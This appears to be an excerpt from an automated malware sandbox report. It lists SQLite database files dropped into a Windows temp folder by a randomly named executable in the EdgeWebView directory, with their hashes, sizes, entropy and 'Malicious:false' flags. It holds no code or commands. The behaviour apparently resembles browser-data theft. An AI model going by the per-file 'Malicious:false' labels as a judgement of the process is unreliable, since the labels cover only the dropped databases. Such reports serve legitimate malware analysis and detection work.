                                                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\kmAYETkSNN

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):106496
                                                                                                                          Entropy (8bit):1.1358696453229276
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\l7IuQd4eNQ

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):114688
                                                                                                                          Entropy (8bit):0.9746603542602881
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\l9uKx3WEQO

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):114688
                                                                                                                          Entropy (8bit):0.9746603542602881
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\lQog2BJXxJ

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):49152
                                                                                                                          Entropy (8bit):0.8180424350137764
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\lTeO8UweaK

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):114688
                                                                                                                          Entropy (8bit):0.9746603542602881
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\lX75Oo2PKz

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20480
                                                                                                                          Entropy (8bit):0.5707520969659783
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\lhbc9O9nrw

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):114688
                                                                                                                          Entropy (8bit):0.9746603542602881
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\lyToktOwt5

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):49152
                                                                                                                          Entropy (8bit):0.8180424350137764
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\mx8d0bhYkS

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):106496
                                                                                                                          Entropy (8bit):1.1358696453229276
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\nIGTAr6QIk

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):114688
                                                                                                                          Entropy (8bit):0.9746603542602881
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\nPi2Q9Ie23

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):40960
                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\nRD7qVi6kX

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):106496
                                                                                                                          Entropy (8bit):1.1358696453229276
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\nqcfI6IBiq

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):49152
                                                                                                                          Entropy (8bit):0.8180424350137764
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\o0ZJNo8hwb

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):106496
                                                                                                                          Entropy (8bit):1.1358696453229276
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\o7JTKCRJG0

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):106496
                                                                                                                          Entropy (8bit):1.1358696453229276
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\oIojv8kiVg

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):40960
                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\oPwOvfOXPc

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20480
                                                                                                                          Entropy (8bit):0.5712781801655107
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\oYXGhvjyJC

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):49152
                                                                                                                          Entropy (8bit):0.8180424350137764
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\ozNcRYksFR

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):106496
                                                                                                                          Entropy (8bit):1.1358696453229276
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\pE1giN7PAI

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):106496
                                                                                                                          Entropy (8bit):1.1358696453229276
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\pbbRgz1INP

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):40960
                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\q4jXkIjioV

                                                                                                                          Download File
